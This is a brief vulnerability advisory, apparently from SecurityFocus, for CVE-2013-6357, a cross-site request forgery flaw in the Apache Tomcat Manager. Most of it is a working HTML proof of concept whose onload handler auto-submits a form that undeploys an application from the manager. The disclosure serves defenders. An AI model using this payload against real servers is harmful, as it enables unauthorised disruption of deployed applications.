Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability

To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.

The following example request is available:
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://www.example.com/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>


 

Privacy Statement
Copyright 2010, SecurityFocus